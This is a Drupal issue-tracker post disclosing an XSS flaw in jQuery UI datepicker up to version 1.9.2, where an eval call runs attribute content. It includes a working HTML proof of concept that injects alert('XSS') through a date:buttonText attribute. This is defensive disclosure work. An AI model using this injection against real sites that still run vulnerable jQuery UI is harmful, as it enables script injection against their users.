- Issue created by @dokumori
Originally reported to the Drupal security team by phatly27 on 18 October 2015. Disclosing the information on the vulnerability as per psa-2022-03-09 → .
VULNERABILITY DETAILS
A potential bug enables us to inject the XSS content into attribute (with format "date: [PROPERTY_IN_DEFAULTS_DATEPICKER]") in any HTML element using _attachDatepicker function of component ui datepicker. This function used the eval syntax to evaluate the javascript code dynamically.
VERSION
Any site using the older versions from version 1.9.2 back to lowest version.
REPRODUCTION CASE
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title></title>
<script src="https://code.jquery.com/jquery-2.1.4.min.js"></script>
<script src="https://code.jquery.com/ui/1.9.2/jquery-ui.min.js"></script>
<script>
$(document).ready(function () {
$.datepicker.setDefaults({
buttonText: 'abcde'
});
$.datepicker._attachDatepicker(document.getElementById("abc"));
$('#datepicker').datepicker();
});
</script>
</head>
<body>
<div id="abc" date:buttonText="alert('XSS')">
<input name="datepicker" id="datepicker" type="text"/>
</div>
</body>
</html>
IN CONCLUSION
we expect that the alert popup shouldn't be displayed and eval syntax should be removed instead. If it displays, any attacker can take advantage of injecting the malicious XSS content into website.
Please see details at here http://jsfiddle.net/wanc8t9g/
Active
Code
It is used for security vulnerabilities which do not need a security advisory. For example, security issues in projects which do not have security advisory coverage, or forward-porting a change already disclosed in a security advisory. See Drupal’s security advisory policy for details. Be careful publicly disclosing security vulnerabilities! Use the “Report a security vulnerability” link in the project page’s sidebar. See how to report a security issue for details.